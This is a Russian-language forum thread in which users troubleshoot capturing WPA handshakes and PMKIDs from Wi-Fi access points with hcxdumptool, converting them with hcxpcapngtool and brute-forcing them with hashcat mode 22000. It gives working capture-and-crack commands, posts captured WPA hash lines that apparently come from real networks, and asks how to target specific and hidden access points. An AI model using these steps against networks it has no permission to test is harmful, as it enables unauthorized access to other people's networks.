Почему в теме подбора паролей вай фай все выкладывают хэндшейки .cap, а не хеш .hc22000? Разве метод, описанный в этой теме не является более актуальным и эффективным? В итоге помогающим придется же конвертировать .cap в .hc22000, чтобы брутить hashcat’ом, или я чего-то не понимаю?))

user100
24.12.2023, 19:37
придется же конвертировать .cap в .hc22000, чтобы брутить hashcat’ом, или я чего-то не понимаю?))



Не все брутят hashcat'ом, да и не все брутят последний версией кота

А вот с этолонного САР файла во что угодно можно сконвертировать, каждому вочто надо.

Piligrim740
17.01.2024, 10:02
этолонного САР файла



По мимо этого, в формате САР, есть масса полезной информации.

К примеру, включен ли WPS, наличие валидных пакетов по таймингам.



Не все брутят hashcat'ом, да и не все брутят последний версией кота



Так и есть, у меня вот в ходу Wireless Password Recovery

krsk
22.03.2024, 23:35
Кто использовал этот метод на железе макбука?

sclovesun
08.10.2024, 23:09
Возможно кому-то пригодится мой опыт.

Активирую получение хендшейка с точки, у которой нет клиентов. Со второго устройства подключаюсь к ней, ввожу пароль 12345678. Хендшейк пойман.

Иду на cap2hashcat/, скармливаю cap файл, на выходе в handshake extraction в числе прочего вижу строки:

RSN PMKID (total)........................: 1

RSN PMKID (best).........................: 1

RSN PMKID written to 22000 hash file.....: 1

что говорит о том, что pmkid получен и записан в итоговый .22000. По итогу в коте при переборе будет строка "Recovered........: 2/2 (100.00%) Digests (total), 1/2 (50.00%)", т.е. один пароль наш не верный, 12345678, а другой - верный из PMKID.

qazqqqq1
13.11.2024, 09:22
wifislax64 3.4

hcxdumptool -o test.pcapng -i wlp0s20f0u1 --enable_status 15 Получен файл test.pcapng

Переводим в нужный формат

hcxpcaptool -z test.16800 test.pcapng PMKID*BSSID*MAC клиента*SSID в HEX формате

В wifislax64 3.4 hcxpcaptool новая 6 я версия и команда hcxpcaptool -z test.16800 test.pcapng не работает и PMKID не получить

помогите с правильной командой

174region174
13.11.2024, 09:33
wifislax64 3.4

hcxdumptool -o test.pcapng -i wlp0s20f0u1 --enable_status 15 Получен файл test.pcapng<br/>
Переводим в нужный формат<br/>
hcxpcaptool -z test.16800 test.pcapng PMKID*BSSID*MAC клиента*SSID в HEX формате<br/>
В wifislax64 3.4 hcxpcaptool новая 6 я версия и команда hcxpcaptool -z test.16800 test.pcapng не работает и PMKID не получить<br/>
помогите с правильной командой<br/>


У меня на kali. https://github.com/ZerBea/hcxdumptool

hcxdumptool -i wlan0 -F -w 'test.pcapng'

hcxpcapngtool -o 1.hc22000 test.pcapng

Ну и после можно запускать брут файла 1.hc22000

hashcat -m 22000

qazqqqq1
13.11.2024, 10:00
Спасибо за быстрый ответ

пробовать буду вечером hcxdumptool -i wlan0 -F -w test.pcapng чтобы получить PMKID*BSSID*MAC клиента*SSID в HEX формате

Wireless Password Recovery использую

qazqqqq1
13.11.2024, 20:45
hcxdumptool -i wlan0 -F -w 'test.pcapng' не работает

hcxpcapngtool -o 1.hc22000 test.pcapng надо другой формат вот такой PMKID*BSSID*MAC клиента*SSID в HEX формате

2 хэша

WPA*02*4476a3befa045e19dc759ee7ce1f8d13*50ff20991e ca*808abd26272a*4861676f726f6d6f47697473756e65*8ed f4a67f2928c8b55db1b3974633960e248ee0e009dc2d4b9a96 9b6f3eb8f5e*0103007502010a00000000000000000001810d fb4e3a3b4997728941515aadc4f7f3a4315f77ddda3ebbba0b 0c8d780a520000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 000000001630140100000fac040100000fac040100000fac02 0000*02

WPA*02*1b5d6296ed81e709251c4825ccb1f353*68e166866e 78*d0df9a85be33*416c656e61*e4d7cdb3b87f77393a402c9 ac1b08a2715c0f9967bc586b47847eb94a403c49d*01030075 02010a0000000000000000f5c21a3ec4f5a58799e12c4fa3f4 2efca7b429d6fe177c23ce2a5cef5137b42631bf0000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000163014010000 0fac040100000fac040100000fac020000*10

WPA*01*9aeb082173cb540570f968d57430bd9c*9094e4b163 ae*b0ece1f34f97*506176656c***

WPA*02*a5453d42e4a66585b9b338e69f8e43a7*d8eb97144c 2f*5c78f8c196b2*416c656e61*e4d7cdb3b87f77393a402c9 ac1b08a2715c0f9967bc586b47847eb94a403c49d*01030075 02010a0000000000000000f5c2a66eb86b5d53ec0cd8a5654a 1d96752de9c58023c512157c4e499098d04e1b2e0000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000163014010000 0fac040100000fac040100000fac020000*10

174region174
13.11.2024, 21:14
hcxdumptool -i wlan0 -F -w 'test.pcapng' не работает

hcxpcapngtool -o 1.hc22000 test.pcapng надо другой формат вот такой PMKID*BSSID*MAC клиента*SSID в HEX формате

2 хэша

WPA*02*4476a3befa045e19dc759ee7ce1f8d13*50ff20991e ca*808abd26272a*4861676f726f6d6f47697473756e65*8ed f4a67f2928c8b55db1b3974633960e248ee0e009dc2d4b9a96 9b6f3eb8f5e*0103007502010a00000000000000000001810d fb4e3a3b4997728941515aadc4f7f3a4315f77ddda3ebbba0b 0c8d780a520000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 000000001630140100000fac040100000fac040100000fac02 0000*02

WPA*02*1b5d6296ed81e709251c4825ccb1f353*68e166866e 78*d0df9a85be33*416c656e61*e4d7cdb3b87f77393a402c9 ac1b08a2715c0f9967bc586b47847eb94a403c49d*01030075 02010a0000000000000000f5c21a3ec4f5a58799e12c4fa3f4 2efca7b429d6fe177c23ce2a5cef5137b42631bf0000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000163014010000 0fac040100000fac040100000fac020000*10

WPA*01*9aeb082173cb540570f968d57430bd9c*9094e4b163 ae*b0ece1f34f97*506176656c***

WPA*02*a5453d42e4a66585b9b338e69f8e43a7*d8eb97144c 2f*5c78f8c196b2*416c656e61*e4d7cdb3b87f77393a402c9 ac1b08a2715c0f9967bc586b47847eb94a403c49d*01030075 02010a0000000000000000f5c2a66eb86b5d53ec0cd8a5654a 1d96752de9c58023c512157c4e499098d04e1b2e0000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000163014010000 0fac040100000fac040100000fac020000*10



То что ты предлагаешь это старый формат.

В нём уже ни кто не ищет. Эти хеши которые ты получил актуальны на данный момент. либо можешь сразу искать из файла .pcapng

В программе WPR без какого либо конвертирования.

Единственный хеш который ты можешь у себя запустить удалив из него лишнее вот этот

9aeb082173cb540570f968d57430bd9c*9094e4b163ae*b0ec e1f34f97*506176656c

qazqqqq1
14.11.2024, 08:38
Если hcxdumptool атаковать конкретную точку доступа или выбранные какая команда подскажи

libvernow
14.11.2024, 21:24
hcxdumptoo



зачем ты себе голову морочишь, в wifislax есть программа bettercap, она хорошо захватывает PMKID и сразу же сохраняет в универсальном формате .pcap

что тебе ещё нужно?

qazqqqq1
15.11.2024, 06:27
Спасибо за совет буду пробовать bettercap, но и hcxdumptool ловит PMKID надо найти лидера!

hcxdumptool v4.2.0 модули старые какой программой сделать новые для wifislax расширение .xzm

скрытые сети чем открыть и словить PMKID? Airodump-ng не помог